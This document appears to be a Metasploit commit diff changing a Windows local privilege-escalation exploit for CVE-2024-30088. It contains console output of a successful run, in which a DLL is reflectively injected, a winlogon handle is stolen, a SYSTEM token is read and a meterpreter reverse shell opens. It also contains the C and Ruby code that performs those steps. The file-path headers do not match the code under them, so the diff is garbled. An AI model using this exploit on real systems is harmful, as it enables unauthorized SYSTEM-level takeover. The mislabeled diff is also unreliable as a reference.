Removed memory polling

Author: jheysel-r7

data/exploits/CVE-2024-30088/CVE-2024-30088.x64.dll

@@ -30,19 +30,17 @@ msf6 > use windows/local/cve_2024_30038_authz_basep
 [*] Using configured payload windows/x64/meterpreter/reverse_tcp
 msf6 exploit(windows/local/cve_2024_30038_authz_basep) > set session -1
 session => -1
-msf6 exploit(windows/local/cve_2024_30038_authz_basep) > exploit
+msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
 
-[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Started reverse TCP handler on 172.16.199.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
-[*] Reflectively injecting the DLL into 9664...
-[*] Attempting to steal the handle from the winlogon process...
-[*] Sleeping for 2 seconds before attempting again
-[+] Successfully stole winlogon handle: 1340
-[+] Successfully retrieved winlogon pid: 736
-[*] Creating the thread to execute in 0x16e4e500000 (pid=736)
-[*] Sending stage (201798 bytes) to 172.16.199.130
-[*] Meterpreter session 63 opened (172.16.199.1:4444 -> 172.16.199.130:49735) at 2024-08-21 22:56:13 -0700
+[*] Reflectively injecting the DLL into 696...
+[+] The exploit was successful, reading SYSTEM token from memory...
+[+] Successfully stole winlogon handle: 3432
+[+] Successfully retrieved winlogon pid: 452
+[*] Sending stage (201798 bytes) to 172.16.199.208
+[*] Meterpreter session 18 opened (172.16.199.1:5555 -> 172.16.199.208:52890) at 2024-08-30 12:45:49 -0700
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM

documentation/modules/exploit/windows/local/cve_2024_30088_authz_basep.md

@@ -9,8 +9,12 @@ HANDLE exploit();
 
 int main(LPVOID address) {
 	HANDLE winlogon_handle = exploit();
-	*(HANDLE*)address = winlogon_handle;
-	ReflectiveFreeAndExitThread(hAppInstance, 0);
+	DWORD dwStatus = ERROR_INVALID_TARGET_HANDLE;
+	if (winlogon_handle) {
+		dwStatus = ERROR_SUCCESS;
+		*(HANDLE*)address = winlogon_handle;
+	}
+	ReflectiveFreeAndExitThread(hAppInstance, dwStatus);
 	return 1;
 }
 

external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c

@@ -113,7 +113,6 @@ def execute_dll(rdll_path, param=nil, pid=nil)
     end
 
     process.thread.create(exploit_mem + offset, param_ptr)
-    nil
   end
 
   #

lib/msf/core/post/windows/process.rb

@@ -118,23 +118,23 @@ def get_winlogon_handle
     process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
     address = process_handle.memory.allocate(8)
 
-    execute_dll(
+    thread = execute_dll(
       ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'),
       address,
       pid
     )
 
+    calls = [
+      ['kernel32', 'WaitForSingleObject', [ thread.handle, 20000 ] ],
+      ['kernel32', 'GetExitCodeThread', [ thread.handle, 4 ] ],
+    ]
+
+    results = session.railgun.multi(calls)
     winlogon_handle = nil
-    current_memory = process_handle.memory.read(address, 8)
-    initial_memory = current_memory
-    print_status('Attempting to steal the handle from the winlogon process...')
 
-    retry_until_truthy(timeout: datastore['SLEEP']) do
+    if results.last['lpExitCode'] == 0
+      print_good("The exploit was successful, reading SYSTEM token from memory...")
       current_memory = process_handle.memory.read(address, 8)
-      break if current_memory != initial_memory
-    end
-
-    if current_memory != initial_memory
       winlogon_handle = current_memory.unpack('Q<').first
     end